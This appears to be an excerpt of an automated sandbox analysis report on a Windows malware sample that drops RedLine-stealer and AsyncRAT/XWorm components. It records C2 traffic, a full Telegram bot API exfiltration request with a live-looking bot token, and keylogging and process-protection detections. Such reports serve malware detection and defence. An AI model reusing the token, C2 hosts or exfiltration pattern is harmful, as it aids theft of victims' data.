                            Source: unknownNetwork traffic detected: HTTP traffic on port 9336 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 9336
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9336 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9336 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 9336
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9336 -> 49737
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 9336
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9336 -> 49738
                            Uses the Telegram API (likely for C&C communication)
                            Source: unknownDNS query: name: api.telegram.org
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.4:49730 -> 147.185.221.20:9336
                            Source: global trafficTCP traffic: 192.168.2.4:49746 -> 45.88.186.18:7000
                            Source: global trafficHTTP traffic detected: GET /bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: pst-child.gl.at.ply.gg:9336Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: pst-child.gl.at.ply.gg:9336Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: pst-child.gl.at.ply.gg:9336Content-Length: 856137Expect: 100-continueAccept-Encoding: gzip, deflate
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: pst-child.gl.at.ply.gg:9336Content-Length: 856129Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                            Source: Joe Sandbox ViewIP Address: 147.185.221.20 147.185.221.20
                            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                            Source: Joe Sandbox ViewASN Name: ANONYMIZEEpikNetworkCH ANONYMIZEEpikNetworkCH
                            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.88.186.18
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: pst-child.gl.at.ply.gg
                            Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: pst-child.gl.at.ply.gg:9336Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                            Source: powershell.exe, 0000000D.00000002.1800097184.00000205807C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                            Source: powershell.exe, 0000000D.00000002.1800097184.00000205807C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                            Source: powershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pst-child.gl.at.ply.gg
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pst-child.gl.at.ply.gg:9336
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pst-child.gl.at.ply.gg:9336/
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                            Source: powershell.exe, 0000000D.00000002.1800097184.00000205807EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                            Source: powershell.exe, 0000000A.00000002.1739488463.000002173F0C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1739488463.000002173EEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E7EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 0000000A.00000002.1739488463.000002173F0C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                            Source: powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 0000000A.00000002.1739488463.000002173EEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E7EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                            Source: wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.drString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                            Source: wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.drString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                            Source: YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                            Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, YsrQekGS.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                            Source: YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=66784
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 0000000A.00000002.1768144280.00000217574C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                            Source: wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.drString found in binary or memory: https://ipinfo.io/ip%appdata%
                            Source: powershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Contains functionality to log keystrokes (.Net Source)
                            Source: YsrQekGS.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            Operating System Destruction

                            barindex
                            Protects its processes via BreakOnTermination flag
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: 01 00 00 00 Jump to behavior

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00406894: __EH_prolog,_wcslen,_wcscpy,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,_wcscpy,_wcscpy,_wcscpy,_wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00406894
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00417AED0_2_00417AED
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00401D010_2_00401D01
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0042702C0_2_0042702C
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0041A9740_2_0041A974
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0040497E0_2_0040497E
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0040C9D50_2_0040C9D5
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_004281AC0_2_004281AC
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_004169B40_2_004169B4
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0041BA490_2_0041BA49
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0041B21D0_2_0041B21D
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0041F2840_2_0041F284
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0041429D0_2_0041429D
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00427AB40_2_00427AB4
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00415B200_2_00415B20
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0040C3B10_2_0040C3B1
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_004143B90_2_004143B9
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00413C710_2_00413C71
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_004104A90_2_004104A9
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_004275700_2_00427570
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0041AE490_2_0041AE49
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_004056080_2_00405608
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0040C6080_2_0040C608
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0041B6290_2_0041B629
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_004146D40_2_004146D4
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00402F240_2_00402F24
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0040FF2D0_2_0040FF2D
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00428FF10_2_00428FF1
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeCode function: 2_2_012EE7B02_2_012EE7B0
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeCode function: 2_2_012EDC902_2_012EDC90
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeCode function: 2_2_065443682_2_06544368
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeCode function: 2_2_065437602_2_06543760
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeCode function: 2_2_065497B02_2_065497B0
